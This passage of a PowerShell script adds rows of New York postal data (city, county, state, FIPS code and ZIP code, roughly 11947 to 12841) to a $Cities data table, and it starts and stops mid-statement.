= $Cities.Rows.Add("Jamesport","Suffolk","New york","NY","36","11947") + $null = $Cities.Rows.Add("Laurel","Suffolk","New york","NY","36","11948") + $null = $Cities.Rows.Add("Manorville","Suffolk","New york","NY","36","11949") + $null = $Cities.Rows.Add("Mastic","Suffolk","New york","NY","36","11950") + $null = $Cities.Rows.Add("Mastic beach","Suffolk","New york","NY","36","11951") + $null = $Cities.Rows.Add("Mattituck","Suffolk","New york","NY","36","11952") + $null = $Cities.Rows.Add("Middle island","Suffolk","New york","NY","36","11953") + $null = $Cities.Rows.Add("Montauk","Suffolk","New york","NY","36","11954") + $null = $Cities.Rows.Add("Moriches","Suffolk","New york","NY","36","11955") + $null = $Cities.Rows.Add("New suffolk","Suffolk","New york","NY","36","11956") + $null = $Cities.Rows.Add("Orient","Suffolk","New york","NY","36","11957") + $null = $Cities.Rows.Add("Peconic","Suffolk","New york","NY","36","11958") + $null = $Cities.Rows.Add("Quogue","Suffolk","New york","NY","36","11959") + $null = $Cities.Rows.Add("Remsenburg","Suffolk","New york","NY","36","11960") + $null = $Cities.Rows.Add("Ridge","Suffolk","New york","NY","36","11961") + $null = $Cities.Rows.Add("Sagaponack","Suffolk","New york","NY","36","11962") + $null = $Cities.Rows.Add("Sag harbor","Suffolk","New york","NY","36","11963") + $null = $Cities.Rows.Add("Shelter island","Suffolk","New york","NY","36","11964") + $null = $Cities.Rows.Add("Shelter island h","Suffolk","New york","NY","36","11965") + $null = $Cities.Rows.Add("Shirley","Suffolk","New york","NY","36","11967") + $null = $Cities.Rows.Add("Southampton","Suffolk","New york","NY","36","11968") + $null = $Cities.Rows.Add("South jamesport","Suffolk","New york","NY","36","11970") + $null = $Cities.Rows.Add("Southold","Suffolk","New york","NY","36","11971") + $null = $Cities.Rows.Add("Speonk","Suffolk","New york","NY","36","11972") + $null = $Cities.Rows.Add("Wainscott","Suffolk","New york","NY","36","11975") + $null = $Cities.Rows.Add("Water mill","Suffolk","New york","NY","36","11976") + $null = $Cities.Rows.Add("Westhampton","Suffolk","New york","NY","36","11977") + $null = $Cities.Rows.Add("Westhampton beac","Suffolk","New york","NY","36","11978") + $null = $Cities.Rows.Add("Yaphank","Suffolk","New york","NY","36","11980") + $null = $Cities.Rows.Add("Zcta 119hh","Suffolk","New york","NY","36","119HH") + $null = $Cities.Rows.Add("Alplaus","Schenectady","New york","NY","36","12008") + $null = $Cities.Rows.Add("Altamont","Albany","New york","NY","36","12009") + $null = $Cities.Rows.Add("West charlton","Montgomery","New york","NY","36","12010") + $null = $Cities.Rows.Add("Athens","Greene","New york","NY","36","12015") + $null = $Cities.Rows.Add("Austerlitz","Columbia","New york","NY","36","12017") + $null = $Cities.Rows.Add("Averill park","Rensselaer","New york","NY","36","12018") + $null = $Cities.Rows.Add("Ballston lake","Saratoga","New york","NY","36","12019") + $null = $Cities.Rows.Add("Ballston spa","Saratoga","New york","NY","36","12020") + $null = $Cities.Rows.Add("Berlin","Rensselaer","New york","NY","36","12022") + $null = $Cities.Rows.Add("Berne","Albany","New york","NY","36","12023") + $null = $Cities.Rows.Add("Broadalbin","Fulton","New york","NY","36","12025") + $null = $Cities.Rows.Add("Burnt hills","Saratoga","New york","NY","36","12027") + $null = $Cities.Rows.Add("Buskirk","Rensselaer","New york","NY","36","12028") + $null = $Cities.Rows.Add("Canaan","Columbia","New york","NY","36","12029") + $null = $Cities.Rows.Add("Carlisle","Schoharie","New york","NY","36","12031") + $null = $Cities.Rows.Add("Caroga lake","Fulton","New york","NY","36","12032") + $null = $Cities.Rows.Add("Castleton on hud","Rensselaer","New york","NY","36","12033") + $null = $Cities.Rows.Add("Central bridge","Schoharie","New york","NY","36","12035") + $null = $Cities.Rows.Add("Charlotteville","Schoharie","New york","NY","36","12036") + $null = $Cities.Rows.Add("Chatham","Columbia","New york","NY","36","12037") + $null = $Cities.Rows.Add("Clarksville","Albany","New york","NY","36","12041") + $null = $Cities.Rows.Add("Climax","Greene","New york","NY","36","12042") + $null = $Cities.Rows.Add("Cobleskill","Schoharie","New york","NY","36","12043") + $null = $Cities.Rows.Add("Coeymans","Albany","New york","NY","36","12045") + $null = $Cities.Rows.Add("Coeymans hollow","Albany","New york","NY","36","12046") + $null = $Cities.Rows.Add("Cohoes","Albany","New york","NY","36","12047") + $null = $Cities.Rows.Add("Coxsackie","Greene","New york","NY","36","12051") + $null = $Cities.Rows.Add("Cropseyville","Rensselaer","New york","NY","36","12052") + $null = $Cities.Rows.Add("Delanson","Schenectady","New york","NY","36","12053") + $null = $Cities.Rows.Add("Delmar","Albany","New york","NY","36","12054") + $null = $Cities.Rows.Add("Duanesburg","Schenectady","New york","NY","36","12056") + $null = $Cities.Rows.Add("White creek","Washington","New york","NY","36","12057") + $null = $Cities.Rows.Add("Earlton","Greene","New york","NY","36","12058") + $null = $Cities.Rows.Add("East berne","Albany","New york","NY","36","12059") + $null = $Cities.Rows.Add("East chatham","Columbia","New york","NY","36","12060") + $null = $Cities.Rows.Add("East greenbush","Rensselaer","New york","NY","36","12061") + $null = $Cities.Rows.Add("East nassau","Rensselaer","New york","NY","36","12062") + $null = $Cities.Rows.Add("East schodack","Rensselaer","New york","NY","36","12063") + $null = $Cities.Rows.Add("East worcester","Otsego","New york","NY","36","12064") + $null = $Cities.Rows.Add("Clifton park","Saratoga","New york","NY","36","12065") + $null = $Cities.Rows.Add("Esperance","Schoharie","New york","NY","36","12066") + $null = $Cities.Rows.Add("Feura bush","Albany","New york","NY","36","12067") + $null = $Cities.Rows.Add("Fonda","Montgomery","New york","NY","36","12068") + $null = $Cities.Rows.Add("Fort johnson","Montgomery","New york","NY","36","12070") + $null = $Cities.Rows.Add("Fultonham","Schoharie","New york","NY","36","12071") + $null = $Cities.Rows.Add("Fultonville","Montgomery","New york","NY","36","12072") + $null = $Cities.Rows.Add("Galway","Saratoga","New york","NY","36","12074") + $null = $Cities.Rows.Add("Ghent","Columbia","New york","NY","36","12075") + $null = $Cities.Rows.Add("Gilboa","Schoharie","New york","NY","36","12076") + $null = $Cities.Rows.Add("Glenmont","Albany","New york","NY","36","12077") + $null = $Cities.Rows.Add("Gloversville","Fulton","New york","NY","36","12078") + $null = $Cities.Rows.Add("Greenville","Greene","New york","NY","36","12083") + $null = $Cities.Rows.Add("Guilderland","Albany","New york","NY","36","12084") + $null = $Cities.Rows.Add("Hagaman","Montgomery","New york","NY","36","12086") + $null = $Cities.Rows.Add("Hannacroix","Greene","New york","NY","36","12087") + $null = $Cities.Rows.Add("Hoosick falls","Rensselaer","New york","NY","36","12090") + $null = $Cities.Rows.Add("Howes cave","Schoharie","New york","NY","36","12092") + $null = $Cities.Rows.Add("Jefferson","Schoharie","New york","NY","36","12093") + $null = $Cities.Rows.Add("Johnsonville","Rensselaer","New york","NY","36","12094") + $null = $Cities.Rows.Add("Johnstown","Fulton","New york","NY","36","12095") + $null = $Cities.Rows.Add("Zcta 120hh","Albany","New york","NY","36","120HH") + $null = $Cities.Rows.Add("Kinderhook","Columbia","New york","NY","36","12106") + $null = $Cities.Rows.Add("Lake pleasant","Hamilton","New york","NY","36","12108") + $null = $Cities.Rows.Add("Latham","Albany","New york","NY","36","12110") + $null = $Cities.Rows.Add("Malden bridge","Columbia","New york","NY","36","12115") + $null = $Cities.Rows.Add("Maryland","Otsego","New york","NY","36","12116") + $null = $Cities.Rows.Add("Mayfield","Fulton","New york","NY","36","12117") + $null = $Cities.Rows.Add("Mechanicville","Saratoga","New york","NY","36","12118") + $null = $Cities.Rows.Add("Medusa","Albany","New york","NY","36","12120") + $null = $Cities.Rows.Add("Melrose","Rensselaer","New york","NY","36","12121") + $null = $Cities.Rows.Add("Middleburgh","Schoharie","New york","NY","36","12122") + $null = $Cities.Rows.Add("Nassau","Rensselaer","New york","NY","36","12123") + $null = $Cities.Rows.Add("New lebanon","Columbia","New york","NY","36","12125") + $null = $Cities.Rows.Add("Niverville","Columbia","New york","NY","36","12130") + $null = $Cities.Rows.Add("North blenheim","Schoharie","New york","NY","36","12131") + $null = $Cities.Rows.Add("Edinburg","Fulton","New york","NY","36","12134") + $null = $Cities.Rows.Add("Old chatham","Columbia","New york","NY","36","12136") + $null = $Cities.Rows.Add("Pattersonville","Schenectady","New york","NY","36","12137") + $null = $Cities.Rows.Add("Taconic lake","Rensselaer","New york","NY","36","12138") + $null = $Cities.Rows.Add("Piseco","Hamilton","New york","NY","36","12139") + $null = $Cities.Rows.Add("Poestenkill","Rensselaer","New york","NY","36","12140") + $null = $Cities.Rows.Add("Ravena","Albany","New york","NY","36","12143") + $null = $Cities.Rows.Add("Rensselaer","Rensselaer","New york","NY","36","12144") + $null = $Cities.Rows.Add("Rensselaerville","Albany","New york","NY","36","12147") + $null = $Cities.Rows.Add("Rexford","Saratoga","New york","NY","36","12148") + $null = $Cities.Rows.Add("Richmondville","Schoharie","New york","NY","36","12149") + $null = $Cities.Rows.Add("Rotterdam juncti","Schenectady","New york","NY","36","12150") + $null = $Cities.Rows.Add("Round lake","Saratoga","New york","NY","36","12151") + $null = $Cities.Rows.Add("Sand lake","Rensselaer","New york","NY","36","12153") + $null = $Cities.Rows.Add("Schaghticoke","Rensselaer","New york","NY","36","12154") + $null = $Cities.Rows.Add("Schenevus","Otsego","New york","NY","36","12155") + $null = $Cities.Rows.Add("Schodack landing","Rensselaer","New york","NY","36","12156") + $null = $Cities.Rows.Add("Schoharie","Schoharie","New york","NY","36","12157") + $null = $Cities.Rows.Add("Selkirk","Albany","New york","NY","36","12158") + $null = $Cities.Rows.Add("Slingerlands","Albany","New york","NY","36","12159") + $null = $Cities.Rows.Add("Sloansville","Schoharie","New york","NY","36","12160") + $null = $Cities.Rows.Add("Speculator","Hamilton","New york","NY","36","12164") + $null = $Cities.Rows.Add("Spencertown","Columbia","New york","NY","36","12165") + $null = $Cities.Rows.Add("Sprakers","Montgomery","New york","NY","36","12166") + $null = $Cities.Rows.Add("Stamford","Delaware","New york","NY","36","12167") + $null = $Cities.Rows.Add("Stephentown","Rensselaer","New york","NY","36","12168") + $null = $Cities.Rows.Add("Stephentown","Rensselaer","New york","NY","36","12169") + $null = $Cities.Rows.Add("Stillwater","Saratoga","New york","NY","36","12170") + $null = $Cities.Rows.Add("Stuyvesant","Columbia","New york","NY","36","12173") + $null = $Cities.Rows.Add("Summit","Schoharie","New york","NY","36","12175") + $null = $Cities.Rows.Add("Surprise","Greene","New york","NY","36","12176") + $null = $Cities.Rows.Add("Troy","Rensselaer","New york","NY","36","12180") + $null = $Cities.Rows.Add("Troy","Rensselaer","New york","NY","36","12182") + $null = $Cities.Rows.Add("Green island","Albany","New york","NY","36","12183") + $null = $Cities.Rows.Add("Valatie","Columbia","New york","NY","36","12184") + $null = $Cities.Rows.Add("Valley falls","Rensselaer","New york","NY","36","12185") + $null = $Cities.Rows.Add("Voorheesville","Albany","New york","NY","36","12186") + $null = $Cities.Rows.Add("Warnerville","Schoharie","New york","NY","36","12187") + $null = $Cities.Rows.Add("Waterford","Saratoga","New york","NY","36","12188") + $null = $Cities.Rows.Add("Watervliet","Albany","New york","NY","36","12189") + $null = $Cities.Rows.Add("Wells","Hamilton","New york","NY","36","12190") + $null = $Cities.Rows.Add("West coxsackie","Greene","New york","NY","36","12192") + $null = $Cities.Rows.Add("Westerlo","Albany","New york","NY","36","12193") + $null = $Cities.Rows.Add("West fulton","Schoharie","New york","NY","36","12194") + $null = $Cities.Rows.Add("West sand lake","Rensselaer","New york","NY","36","12196") + $null = $Cities.Rows.Add("Worcester","Otsego","New york","NY","36","12197") + $null = $Cities.Rows.Add("Wynantskill","Rensselaer","New york","NY","36","12198") + $null = $Cities.Rows.Add("Zcta 121hh","Albany","New york","NY","36","121HH") + $null = $Cities.Rows.Add("Zcta 121xx","Hamilton","New york","NY","36","121XX") + $null = $Cities.Rows.Add("Albany","Albany","New york","NY","36","12202") + $null = $Cities.Rows.Add("Mc kownville","Albany","New york","NY","36","12203") + $null = $Cities.Rows.Add("Albany","Albany","New york","NY","36","12204") + $null = $Cities.Rows.Add("Roessleville","Albany","New york","NY","36","12205") + $null = $Cities.Rows.Add("Albany","Albany","New york","NY","36","12206") + $null = $Cities.Rows.Add("Albany","Albany","New york","NY","36","12207") + $null = $Cities.Rows.Add("Albany","Albany","New york","NY","36","12208") + $null = $Cities.Rows.Add("Albany","Albany","New york","NY","36","12209") + $null = $Cities.Rows.Add("Albany","Albany","New york","NY","36","12210") + $null = $Cities.Rows.Add("Loudonville","Albany","New york","NY","36","12211") + $null = $Cities.Rows.Add("Zcta 122hh","Albany","New york","NY","36","122HH") + $null = $Cities.Rows.Add("Mayfair","Schenectady","New york","NY","36","12302") + $null = $Cities.Rows.Add("Rotterdam","Schenectady","New york","NY","36","12303") + $null = $Cities.Rows.Add("Schenectady","Schenectady","New york","NY","36","12304") + $null = $Cities.Rows.Add("Schenectady","Schenectady","New york","NY","36","12305") + $null = $Cities.Rows.Add("Schenectady","Schenectady","New york","NY","36","12306") + $null = $Cities.Rows.Add("Schenectady","Schenectady","New york","NY","36","12307") + $null = $Cities.Rows.Add("Schenectady","Schenectady","New york","NY","36","12308") + $null = $Cities.Rows.Add("Niskayuna","Schenectady","New york","NY","36","12309") + $null = $Cities.Rows.Add("Zcta 123hh","Schenectady","New york","NY","36","123HH") + $null = $Cities.Rows.Add("Eddyville","Ulster","New york","NY","36","12401") + $null = $Cities.Rows.Add("Accord","Ulster","New york","NY","36","12404") + $null = $Cities.Rows.Add("Acra","Greene","New york","NY","36","12405") + $null = $Cities.Rows.Add("Arkville","Delaware","New york","NY","36","12406") + $null = $Cities.Rows.Add("Ashland","Greene","New york","NY","36","12407") + $null = $Cities.Rows.Add("Shady","Ulster","New york","NY","36","12409") + $null = $Cities.Rows.Add("Oliverea","Ulster","New york","NY","36","12410") + $null = $Cities.Rows.Add("Bloomington","Ulster","New york","NY","36","12411") + $null = $Cities.Rows.Add("Boiceville","Ulster","New york","NY","36","12412") + $null = $Cities.Rows.Add("Cairo","Greene","New york","NY","36","12413") + $null = $Cities.Rows.Add("Catskill","Greene","New york","NY","36","12414") + $null = $Cities.Rows.Add("Chichester","Ulster","New york","NY","36","12416") + $null = $Cities.Rows.Add("Cornwallville","Greene","New york","NY","36","12418") + $null = $Cities.Rows.Add("Cottekill","Ulster","New york","NY","36","12419") + $null = $Cities.Rows.Add("Cragsmoor","Ulster","New york","NY","36","12420") + $null = $Cities.Rows.Add("Denver","Delaware","New york","NY","36","12421") + $null = $Cities.Rows.Add("Durham","Greene","New york","NY","36","12422") + $null = $Cities.Rows.Add("East durham","Greene","New york","NY","36","12423") + $null = $Cities.Rows.Add("East jewett","Greene","New york","NY","36","12424") + $null = $Cities.Rows.Add("Elka park","Greene","New york","NY","36","12427") + $null = $Cities.Rows.Add("Ellenville","Ulster","New york","NY","36","12428") + $null = $Cities.Rows.Add("Esopus","Ulster","New york","NY","36","12429") + $null = $Cities.Rows.Add("Halcott center","Delaware","New york","NY","36","12430") + $null = $Cities.Rows.Add("Freehold","Greene","New york","NY","36","12431") + $null = $Cities.Rows.Add("Glenford","Ulster","New york","NY","36","12433") + $null = $Cities.Rows.Add("Grand gorge","Delaware","New york","NY","36","12434") + $null = $Cities.Rows.Add("Greenfield park","Ulster","New york","NY","36","12435") + $null = $Cities.Rows.Add("East windham","Greene","New york","NY","36","12439") + $null = $Cities.Rows.Add("High falls","Ulster","New york","NY","36","12440") + $null = $Cities.Rows.Add("Hunter","Greene","New york","NY","36","12442") + $null = $Cities.Rows.Add("Hurley","Ulster","New york","NY","36","12443") + $null = $Cities.Rows.Add("Jewett","Greene","New york","NY","36","12444") + $null = $Cities.Rows.Add("Kerhonkson","Ulster","New york","NY","36","12446") + $null = $Cities.Rows.Add("Lake hill","Ulster","New york","NY","36","12448") + $null = $Cities.Rows.Add("Lake katrine","Ulster","New york","NY","36","12449") + $null = $Cities.Rows.Add("Lanesville","Greene","New york","NY","36","12450") + $null = $Cities.Rows.Add("Leeds","Greene","New york","NY","36","12451") + $null = $Cities.Rows.Add("Maplecrest","Greene","New york","NY","36","12454") + $null = $Cities.Rows.Add("Kelly corners","Delaware","New york","NY","36","12455") + $null = $Cities.Rows.Add("Mount marion","Ulster","New york","NY","36","12456") + $null = $Cities.Rows.Add("Mount tremper","Ulster","New york","NY","36","12457") + $null = $Cities.Rows.Add("Napanoch","Ulster","New york","NY","36","12458") + $null = $Cities.Rows.Add("New kingston","Delaware","New york","NY","36","12459") + $null = $Cities.Rows.Add("Oak hill","Greene","New york","NY","36","12460") + $null = $Cities.Rows.Add("Krumville","Ulster","New york","NY","36","12461") + $null = $Cities.Rows.Add("Palenville","Greene","New york","NY","36","12463") + $null = $Cities.Rows.Add("Phoenicia","Ulster","New york","NY","36","12464") + $null = $Cities.Rows.Add("Port ewen","Ulster","New york","NY","36","12466") + $null = $Cities.Rows.Add("Prattsville","Greene","New york","NY","36","12468") + $null = $Cities.Rows.Add("Preston hollow","Albany","New york","NY","36","12469") + $null = $Cities.Rows.Add("Purling","Greene","New york","NY","36","12470") + $null = $Cities.Rows.Add("Rifton","Ulster","New york","NY","36","12471") + $null = $Cities.Rows.Add("Rosendale","Ulster","New york","NY","36","12472") + $null = $Cities.Rows.Add("Round top","Greene","New york","NY","36","12473") + $null = $Cities.Rows.Add("Roxbury","Delaware","New york","NY","36","12474") + $null = $Cities.Rows.Add("Saugerties","Ulster","New york","NY","36","12477") + $null = $Cities.Rows.Add("Shandaken","Ulster","New york","NY","36","12480") + $null = $Cities.Rows.Add("Shokan","Ulster","New york","NY","36","12481") + $null = $Cities.Rows.Add("South cairo","Greene","New york","NY","36","12482") + $null = $Cities.Rows.Add("Stone ridge","Ulster","New york","NY","36","12484") + $null = $Cities.Rows.Add("Tannersville","Greene","New york","NY","36","12485") + $null = $Cities.Rows.Add("Tillson","Ulster","New york","NY","36","12486") + $null = $Cities.Rows.Add("Ulster park","Ulster","New york","NY","36","12487") + $null = $Cities.Rows.Add("Wawarsing","Ulster","New york","NY","36","12489") + $null = $Cities.Rows.Add("West hurley","Ulster","New york","NY","36","12491") + $null = $Cities.Rows.Add("West kill","Greene","New york","NY","36","12492") + $null = $Cities.Rows.Add("West park","Ulster","New york","NY","36","12493") + $null = $Cities.Rows.Add("West shokan","Ulster","New york","NY","36","12494") + $null = $Cities.Rows.Add("Willow","Ulster","New york","NY","36","12495") + $null = $Cities.Rows.Add("Windham","Greene","New york","NY","36","12496") + $null = $Cities.Rows.Add("Woodstock","Ulster","New york","NY","36","12498") + $null = $Cities.Rows.Add("Zcta 124hh","Delaware","New york","NY","36","124HH") + $null = $Cities.Rows.Add("Amenia","Dutchess","New york","NY","36","12501") + $null = $Cities.Rows.Add("Ancram","Columbia","New york","NY","36","12502") + $null = $Cities.Rows.Add("Ancramdale","Columbia","New york","NY","36","12503") + $null = $Cities.Rows.Add("Barrytown","Dutchess","New york","NY","36","12507") + $null = $Cities.Rows.Add("Beacon","Dutchess","New york","NY","36","12508") + $null = $Cities.Rows.Add("Claverack","Columbia","New york","NY","36","12513") + $null = $Cities.Rows.Add("Clinton corners","Dutchess","New york","NY","36","12514") + $null = $Cities.Rows.Add("Clintondale","Ulster","New york","NY","36","12515") + $null = $Cities.Rows.Add("Copake","Columbia","New york","NY","36","12516") + $null = $Cities.Rows.Add("Copake falls","Columbia","New york","NY","36","12517") + $null = $Cities.Rows.Add("Cornwall","Orange","New york","NY","36","12518") + $null = $Cities.Rows.Add("Cornwall on huds","Orange","New york","NY","36","12520") + $null = $Cities.Rows.Add("Craryville","Columbia","New york","NY","36","12521") + $null = $Cities.Rows.Add("Dover plains","Dutchess","New york","NY","36","12522") + $null = $Cities.Rows.Add("Elizaville","Columbia","New york","NY","36","12523") + $null = $Cities.Rows.Add("Fishkill","Dutchess","New york","NY","36","12524") + $null = $Cities.Rows.Add("Gardiner","Ulster","New york","NY","36","12525") + $null = $Cities.Rows.Add("Germantown","Columbia","New york","NY","36","12526") + $null = $Cities.Rows.Add("Highland","Ulster","New york","NY","36","12528") + $null = $Cities.Rows.Add("Hillsdale","Columbia","New york","NY","36","12529") + $null = $Cities.Rows.Add("Holmes","Dutchess","New york","NY","36","12531") + $null = $Cities.Rows.Add("Hopewell junctio","Dutchess","New york","NY","36","12533") + $null = $Cities.Rows.Add("Hudson","Columbia","New york","NY","36","12534") + $null = $Cities.Rows.Add("Hyde park","Dutchess","New york","NY","36","12538") + $null = $Cities.Rows.Add("Lagrangeville","Dutchess","New york","NY","36","12540") + $null = $Cities.Rows.Add("Marlboro","Ulster","New york","NY","36","12542") + $null = $Cities.Rows.Add("Maybrook","Orange","New york","NY","36","12543") + $null = $Cities.Rows.Add("Millbrook","Dutchess","New york","NY","36","12545") + $null = $Cities.Rows.Add("Millerton","Dutchess","New york","NY","36","12546") + $null = $Cities.Rows.Add("Milton","Ulster","New york","NY","36","12547") + $null = $Cities.Rows.Add("Modena","Ulster","New york","NY","36","12548") + $null = $Cities.Rows.Add("Montgomery","Orange","New york","NY","36","12549") + $null = $Cities.Rows.Add("Middle hope","Orange","New york","NY","36","12550") + $null = $Cities.Rows.Add("New windsor","Orange","New york","NY","36","12553") + $null = $Cities.Rows.Add("Mohonk lake","Ulster","New york","NY","36","12561") + $null = $Cities.Rows.Add("Patterson","Putnam","New york","NY","36","12563") + $null = $Cities.Rows.Add("Pawling","Dutchess","New york","NY","36","12564") + $null = $Cities.Rows.Add("Philmont","Columbia","New york","NY","36","12565") + $null = $Cities.Rows.Add("Pine bush","Ulster","New york","NY","36","12566") + $null = $Cities.Rows.Add("Pine plains","Dutchess","New york","NY","36","12567") + $null = $Cities.Rows.Add("Pleasant valley","Dutchess","New york","NY","36","12569") + $null = $Cities.Rows.Add("Poughquag","Dutchess","New york","NY","36","12570") + $null = $Cities.Rows.Add("Red hook","Dutchess","New york","NY","36","12571") + $null = $Cities.Rows.Add("Rhinebeck","Dutchess","New york","NY","36","12572") + $null = $Cities.Rows.Add("Rock tavern","Orange","New york","NY","36","12575") + $null = $Cities.Rows.Add("Salisbury mills","Orange","New york","NY","36","12577") + $null = $Cities.Rows.Add("Salt point","Dutchess","New york","NY","36","12578") + $null = $Cities.Rows.Add("Staatsburg","Dutchess","New york","NY","36","12580") + $null = $Cities.Rows.Add("Stanfordville","Dutchess","New york","NY","36","12581") + $null = $Cities.Rows.Add("Stormville","Dutchess","New york","NY","36","12582") + $null = $Cities.Rows.Add("Tivoli","Dutchess","New york","NY","36","12583") + $null = $Cities.Rows.Add("Verbank","Dutchess","New york","NY","36","12585") + $null = $Cities.Rows.Add("Walden","Orange","New york","NY","36","12586") + $null = $Cities.Rows.Add("Wallkill","Ulster","New york","NY","36","12589") + $null = $Cities.Rows.Add("New hamburg","Dutchess","New york","NY","36","12590") + $null = $Cities.Rows.Add("Wassaic","Dutchess","New york","NY","36","12592") + $null = $Cities.Rows.Add("Wingdale","Dutchess","New york","NY","36","12594") + $null = $Cities.Rows.Add("Zcta 125hh","Columbia","New york","NY","36","125HH") + $null = $Cities.Rows.Add("Zcta 125xx","Orange","New york","NY","36","125XX") + $null = $Cities.Rows.Add("South road","Dutchess","New york","NY","36","12601") + $null = $Cities.Rows.Add("Arlington","Dutchess","New york","NY","36","12603") + $null = $Cities.Rows.Add("Zcta 126hh","Dutchess","New york","NY","36","126HH") + $null = $Cities.Rows.Add("Monticello","Sullivan","New york","NY","36","12701") + $null = $Cities.Rows.Add("Barryville","Sullivan","New york","NY","36","12719") + $null = $Cities.Rows.Add("Bethel","Sullivan","New york","NY","36","12720") + $null = $Cities.Rows.Add("Bloomingburg","Sullivan","New york","NY","36","12721") + $null = $Cities.Rows.Add("Callicoon","Sullivan","New york","NY","36","12723") + $null = $Cities.Rows.Add("Callicoon center","Sullivan","New york","NY","36","12724") + $null = $Cities.Rows.Add("Claryville","Ulster","New york","NY","36","12725") + $null = $Cities.Rows.Add("Fosterdale","Sullivan","New york","NY","36","12726") + $null = $Cities.Rows.Add("Cochecton center","Sullivan","New york","NY","36","12727") + $null = $Cities.Rows.Add("Cuddebackville","Orange","New york","NY","36","12729") + $null = $Cities.Rows.Add("Eldred","Sullivan","New york","NY","36","12732") + $null = $Cities.Rows.Add("Fallsburg","Sullivan","New york","NY","36","12733") + $null = $Cities.Rows.Add("Grossinger","Sullivan","New york","NY","36","12734") + $null = $Cities.Rows.Add("Fremont center","Sullivan","New york","NY","36","12736") + $null = $Cities.Rows.Add("Glen spey","Sullivan","New york","NY","36","12737") + $null = $Cities.Rows.Add("Glen wild","Sullivan","New york","NY","36","12738") + $null = $Cities.Rows.Add("Godeffroy","Orange","New york","NY","36","12739") + $null = $Cities.Rows.Add("Grahamsville","Sullivan","New york","NY","36","12740") + $null = $Cities.Rows.Add("Mileses","Sullivan","New york","NY","36","12741") + $null = $Cities.Rows.Add("Harris","Sullivan","New york","NY","36","12742") + $null = $Cities.Rows.Add("Highland lake","Sullivan","New york","NY","36","12743") + $null = $Cities.Rows.Add("Huguenot","Orange","New york","NY","36","12746") + $null = $Cities.Rows.Add("Hurleyville","Sullivan","New york","NY","36","12747") + $null = $Cities.Rows.Add("Jeffersonville","Sullivan","New york","NY","36","12748") + $null = $Cities.Rows.Add("Kauneonga lake","Sullivan","New york","NY","36","12749") + $null = $Cities.Rows.Add("Kiamesha lake","Sullivan","New york","NY","36","12751") + $null = $Cities.Rows.Add("Lake huntington","Sullivan","New york","NY","36","12752") + $null = $Cities.Rows.Add("Liberty","Sullivan","New york","NY","36","12754") + $null = $Cities.Rows.Add("Livingston manor","Sullivan","New york","NY","36","12758") + $null = $Cities.Rows.Add("Loch sheldrake","Sullivan","New york","NY","36","12759") + $null = $Cities.Rows.Add("Long eddy","Delaware","New york","NY","36","12760") + $null = $Cities.Rows.Add("Mongaup valley","Sullivan","New york","NY","36","12762") + $null = $Cities.Rows.Add("Mountain dale","Sullivan","New york","NY","36","12763") + $null = $Cities.Rows.Add("Narrowsburg","Sullivan","New york","NY","36","12764") + $null = $Cities.Rows.Add("Neversink","Sullivan","New york","NY","36","12765") + $null = $Cities.Rows.Add("North branch","Sullivan","New york","NY","36","12766") + $null = $Cities.Rows.Add("Parksville","Sullivan","New york","NY","36","12768") + $null = $Cities.Rows.Add("Pond eddy","Sullivan","New york","NY","36","12770") + $null = $Cities.Rows.Add("Port jervis","Orange","New york","NY","36","12771") + $null = $Cities.Rows.Add("Rock hill","Sullivan","New york","NY","36","12775") + $null = $Cities.Rows.Add("Cook falls","Sullivan","New york","NY","36","12776") + $null = $Cities.Rows.Add("Forestburgh","Sullivan","New york","NY","36","12777") + $null = $Cities.Rows.Add("Smallwood","Sullivan","New york","NY","36","12778") + $null = $Cities.Rows.Add("South fallsburg","Sullivan","New york","NY","36","12779") + $null = $Cities.Rows.Add("Sparrowbush","Orange","New york","NY","36","12780") + $null = $Cities.Rows.Add("Swan lake","Sullivan","New york","NY","36","12783") + $null = $Cities.Rows.Add("Thompsonville","Sullivan","New york","NY","36","12784") + $null = $Cities.Rows.Add("Westbrookville","Sullivan","New york","NY","36","12785") + $null = $Cities.Rows.Add("White lake","Sullivan","New york","NY","36","12786") + $null = $Cities.Rows.Add("White sulphur sp","Sullivan","New york","NY","36","12787") + $null = $Cities.Rows.Add("Woodbourne","Sullivan","New york","NY","36","12788") + $null = $Cities.Rows.Add("Woodridge","Sullivan","New york","NY","36","12789") + $null = $Cities.Rows.Add("Wurtsboro","Sullivan","New york","NY","36","12790") + $null = $Cities.Rows.Add("Youngsville","Sullivan","New york","NY","36","12791") + $null = $Cities.Rows.Add("Yulan","Sullivan","New york","NY","36","12792") + $null = $Cities.Rows.Add("Zcta 127hh","Delaware","New york","NY","36","127HH") + $null = $Cities.Rows.Add("Queensbury","Warren","New york","NY","36","12801") + $null = $Cities.Rows.Add("South glens fall","Saratoga","New york","NY","36","12803") + $null = $Cities.Rows.Add("Queensbury","Warren","New york","NY","36","12804") + $null = $Cities.Rows.Add("Adirondack","Warren","New york","NY","36","12808") + $null = $Cities.Rows.Add("Argyle","Washington","New york","NY","36","12809") + $null = $Cities.Rows.Add("Athol","Warren","New york","NY","36","12810") + $null = $Cities.Rows.Add("Blue mountain la","Hamilton","New york","NY","36","12812") + $null = $Cities.Rows.Add("Bolton landing","Warren","New york","NY","36","12814") + $null = $Cities.Rows.Add("Brant lake","Warren","New york","NY","36","12815") + $null = $Cities.Rows.Add("Cambridge","Washington","New york","NY","36","12816") + $null = $Cities.Rows.Add("Chestertown","Warren","New york","NY","36","12817") + $null = $Cities.Rows.Add("Clemons","Washington","New york","NY","36","12819") + $null = $Cities.Rows.Add("Comstock","Washington","New york","NY","36","12821") + $null = $Cities.Rows.Add("Corinth","Saratoga","New york","NY","36","12822") + $null = $Cities.Rows.Add("Cossayuna","Washington","New york","NY","36","12823") + $null = $Cities.Rows.Add("Diamond point","Warren","New york","NY","36","12824") + $null = $Cities.Rows.Add("Fort ann","Washington","New york","NY","36","12827") + $null = $Cities.Rows.Add("Fort edward","Washington","New york","NY","36","12828") + $null = $Cities.Rows.Add("Gansevoort","Saratoga","New york","NY","36","12831") + $null = $Cities.Rows.Add("Granville","Washington","New york","NY","36","12832") + $null = $Cities.Rows.Add("Greenfield cente","Saratoga","New york","NY","36","12833") + $null = $Cities.Rows.Add("Thomson","Washington","New york","NY","36","12834") + $null = $Cities.Rows.Add("Hadley","Saratoga","New york","NY","36","12835") + $null = $Cities.Rows.Add("Hague","Warren","New york","NY","36","12836") + $null = $Cities.Rows.Add("Hampton","Washington","New york","NY","36","12837") + $null = $Cities.Rows.Add("Hartford","Washington","New york","NY","36","12838") + $null = $Cities.Rows.Add("Hudson falls","Washington","New york","NY","36","12839") + $null = $Cities.Rows.Add("Huletts landing","Washington","New york","NY","36","12841") + $null = 